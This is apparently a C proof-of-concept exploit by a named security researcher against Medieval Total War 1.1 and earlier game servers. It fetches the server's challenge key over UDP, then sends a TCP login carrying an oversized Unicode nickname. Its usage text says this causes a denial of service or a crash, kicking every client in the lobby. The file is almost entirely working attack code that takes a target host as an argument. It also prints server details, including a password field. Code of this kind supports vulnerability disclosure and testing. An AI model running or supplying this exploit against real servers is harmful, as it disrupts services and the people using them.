#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif








#define VER     "0.1"
#define PORT    18321
#define BUFFSZ  1024
#define TIMEOUT 5
#define S1      "\x00\x00\x81\x00\x00\x00\x00"









void unicode_memset(u_char *to, u_char chr, u_long len);
void show_word(u_char *buff, int num);
void timeout(int sock);
u_long resolv(char *host);
void std_err(void);










int main(int argc, char *argv[]) {
    u_char  *buffsend,
            *buffrecv;
    struct  sockaddr_in     peer;
    int     sd,
            err,
            plen,
            blen;
    u_long  key;
    u_short port = PORT;


    setbuf(stdout, NULL);

    fputs("\n"
        "Medieval Total War <= 1.1 broadcast kick and crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n\n"
        "All the clients connected to the server and the same server in the Lobby\n"
        "screen will be kicked or crashed immediately\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\nUsage: %s <num_of_chars*> <host> [port(%d)]\n"
            "\n"
            "* Number of Unicode chars in the nickname:\n"
            "0  = \"Connection expired\" denial of service\n"
            "76 = crash. You can also use bigger amout of chars to test other exceptions\n"
            "     (FYI each unicode char is 2 bytes long)\n"
            "\n", argv[0], PORT);
        exit(1);
    }



#ifdef WIN
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    plen                 = sizeof(peer);




    buffrecv = malloc(BUFFSZ + 1);
    if(!buffrecv) std_err();



        /* UDP */

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    fputs("Getting the challenge key of the remote server...\n\n", stdout);

    err = sendto(sd, "\x48\x00\xff\xff\xff", 5, 0, (struct sockaddr *)&peer, plen);
    if(err < 0) std_err();

    while(1) {
        timeout(sd);
        err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &plen);
        if(err < 0) std_err();

        if(*buffrecv == 0x49) {
            show_word(buffrecv + 0x29, 4);
            key = *(u_long *)(buffrecv + 5);
            printf("Challenge key: %lu\n", key);
            break;
        } else {
            show_word(buffrecv + 1, 1);
        }
    }

    close(sd);



        /* buffer */

    err = atoi(argv[1]) << 1;
    blen = 7 + err + 10;
    buffsend = malloc(blen);
    if(!buffsend) std_err();
    memcpy(buffsend, S1, 7);
    memcpy(buffsend + 3, &key, 4);
    unicode_memset(buffsend + 7, 'a', err >> 1);
    memset(buffsend + 7 + err, 0x00, 10);




        /* TCP */

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();
    err = send(sd, buffsend, blen, 0);
    if(err < 0) std_err();

    timeout(sd);
    err = recv(sd, buffrecv, BUFFSZ, 0);
    if(err < 0) std_err();

    close(sd);


    if(*buffrecv == 0x02) {
        fputs("\nRemote server is full or the game is already started, so you cannot exploit it!\n", stdout);
    } else {
        fputs("\nMalicious login informations successfully sent\n\n", stdout);
    }

    return(0);
}








void unicode_memset(u_char *to, u_char chr, u_long len) {
    for(; len > 0; len--) {
        *to++ = 0x00;
        *to++ = chr;
    }
}







        /* too lame, but this is only a proof-of-concept */
void show_word(u_char *buff, int num) {
    int i;

    if(*buff) buff++;       // too lame
    buff++;                 // skip the first zero
    for(i = 0; i < num; i++) {
        switch(i) {
            case 0: {
                if(num == 1) fputs("Admin name:    ", stdout);
                    else fputs("Map name:      ", stdout);
                } break;
            case 1: fputs("Server name:   ", stdout); break;
            case 2: fputs("Password:      ", stdout); break;
            case 3: fputs("Campaign:      ", stdout); break;
            default: fputs("Info:          ", stdout); break;
        }
        while(*buff) {
            fputc(*buff, stdout);
            buff += 2;
        }
        fputc('\n', stdout);
        buff += 2;
    }
}







void timeout(int sock) {
    struct  timeval timeout;
    fd_set  fd_read;
    int err;


    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;

    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &timeout);
    if(err < 0) std_err();
    if(err == 0) {
        printf("\nError: Socket timeout, no answers received\n");
        exit(1);
    }
}







u_long resolv(char *host) {
    struct      hostent *hp;
    u_long      host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n",
                host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }

    return(host_ip);
}









#ifndef WIN
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


